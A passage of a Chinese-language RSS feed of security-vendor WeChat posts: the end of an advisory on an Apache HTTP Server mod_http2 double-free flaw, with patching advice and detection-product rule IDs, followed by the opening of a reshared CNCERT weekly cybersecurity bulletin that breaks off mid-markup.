leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041857" src="https://wechat2rss.xlab.app/img-proxy/?k=3fccdcbe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRkODAueJa7icpYuUfUE8nqX5se0eQTicD1ic0EFkbNoJYtPRYpibmHeDV5LIhVntw9DHalq95pfJbia771Efibu8ia6Y1NqwsTWlOofI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache Http Server的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】 </span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0005607。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0005607。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">规则ID:SF-2026-00908。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01019。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01019。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">规则ID:SF-2026-00908。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://httpd.apache.org/security/vulnerabilities_24.html" target="_blank">https://httpd.apache.org/security/vulnerabilities_24.html</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/07</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Apache HTTP Server mod_http2 双重释放漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/08</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4787037037037037" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041877" src="https://wechat2rss.xlab.app/img-proxy/?k=1c61fb2e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxQmKE1nIR6iaLHoU8FELDiaFSpic7NPw22oUV3rko4icCTqTEYiaoXFcBuUlvSGsqoEIIia7YniafcgdT7wF6BxhvkFmQPzavPTBJu3os%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16354%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d096d7a6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525526%26idx%3D1%26sn%3D07ac03abdde556813ff744b9ca642ed8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 16:49:00 +0800</pubDate>
    </item>
    <item>
      <title>网络安全信息与动态周报2026年第18期（4月27日-5月3日）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525526&amp;idx=2&amp;sn=c8961b713f0d04f93938d103465639a7</link>
      <description>分享一篇文章。</description>
      <content:encoded><![CDATA[<p><span>深信服千里目安全技术中心</span> <span>2026-05-08 16:49</span> <span style="display: inline-block;">北京</span></p>


  <p>分享一篇文章。</p>
  <p><strong>国家互联网应急中心CNCERT</strong>: <a href="http://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw%3D%3D&amp;mid=2247501572&amp;idx=1&amp;sn=ad9361dcd2267feb171fa9f9801fef53&amp;scene=45#wechat_redirect">网络安全信息与动态周报2026年第18期（4月27日-5月3日）</a></p>





  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=99ed1dd3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F1HvTteAHz64B9FXg7TWqjibgFkZTpMg6I2icBfQbxvrJwCxribRnq08fcTYO7C71LnU0fv0KCLz8gswV7SiaL3Qic1g%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本周，互联网网络安全态势整体评价为良。</p>
  <div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;background-color: rgb(255, 255, 255);visibility: visible;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;visibility: visible;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);visibility: visible;"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;visibility: visible;"><div style="outline: 0px;color: rgb(255, 255, 255);visibility: visible;"><p style="outline: 0px;font-size: 16px;visibility: visible;"><span style="outline: 0px;font-size: 15px;visibility: visible;"><span leaf="">本周网络安全基本态势</span></span></p></div></div></div></div></div><p style="margin-bottom: 5px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-indent: 2em;letter-spacing: 0.54px;visibility: visible;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;visibility: visible;"><span leaf="">本周，互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳，全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.1383458646616542" data-s="300,640" data-type="png" data-w="665" type="block" data-imgfileid="100017923" src="https://wechat2rss.xlab.app/img-proxy/?k=84f5e84b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FaoXpXT1UJRianIMQWDeicAheRSk70EdGGFdhafG0NroJYQdjrHv5PUQyS7zYIxKrd66Ps2YENOYeBWu38YMOlFAHYXUpLNicNB2MbbuG2vcuk8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017907" data-ratio="1.0911764705882352" data-s="300,640" type="block" data-type="png" data-w="680" style="width:578px;height:631px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d3fafde5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FaoXpXT1UJRiaVBaKPgVfK0fqSuzIdeWt5KNG3ml3CD2jibTPUv5q0zJTBCr879Bv8sTufNVYOREGY2cPoRESapeJtbAaxiaoTxTIicHmp1ic130E%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017910" data-ratio="0.6461988304093568" data-s="300,640" type="block" data-type="png" data-w="684" src="https://wechat2rss.xlab.app/img-proxy/?k=02f807e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRiaQuczymM9CdjcMjhdGUdiadicDacQtibjry8oSQX7TwL6JrgwnsWuibdCLFnbqXEV0f8qwtIMtRLM0HCKuRto7FbkvvbEMibrSiaND8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4426470588235294" data-s="300,640" data-type="png" data-w="680" type="block" data-imgfileid="100017916" src="https://wechat2rss.xlab.app/img-proxy/?k=49236f79&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRjxHiceUpichVFej3sEC4gHP9VD9nrew9rvjbbnFed4EOfBmnibg0XNjZrPpT3mBISodbkbibwUK3qT2UcTCgsr63DUPNpXyEaO9aw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017918" data-ratio="1.2859237536656891" data-s="300,640" type="block" data-type="png" data-w="682" src="https://wechat2rss.xlab.app/img-proxy/?k=d3958551&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FaoXpXT1UJRgKUiaibruQEptZxFDVlUCYqdh3N7XyicxDP8M1z0ZuoU9ThRs0uZiazaGOO58aHP5eIGvo2zy2UkXUm4w5rzG7aPckJ7Qvxly3w1A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;"><div style="outline: 0px;color: rgb(255, 255, 255);"><p style="outline: 0px;font-size: 16px;"><span style="outline: 0px;font-size: 15px;"><span leaf="">本周事件处理情况</span></span></p></div></div></div></div></div><p style="margin-bottom: 16px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.5em;text-indent: 2em;letter-spacing: 0.54px;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;"><p><span leaf="">本周，CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件280起，含跨境网络安全事件125起。其中，协调境内外域名注册机构、境外CERT等机构重点处理218起仿冒投诉事件。</span></p></span></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="outline: 0px;text-align: center;"><div style="padding-right: 8px;padding-left: 8px;outline: 0px;height: 40px;color: rgb(255, 255, 255);line-height: 40px;font-size: 16px;display: inline-block;background-color: rgb(79, 129, 189);"><p style="outline: 0px;"><span style="outline: 0px;font-size: 14px;"><span leaf="">近期回顾</span></span></p></div></div></div><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501549&amp;idx=1&amp;sn=97ecbb76c2cb79f98d955fbb80b7cdb4&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第17期（4月20日-4月26日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第17期（4月20日-4月26日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501491&amp;idx=1&amp;sn=a6e040484ce7882bf47d50987410bfe4&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第16期（4月13日-4月19日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第16期（4月13日-4月19日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: 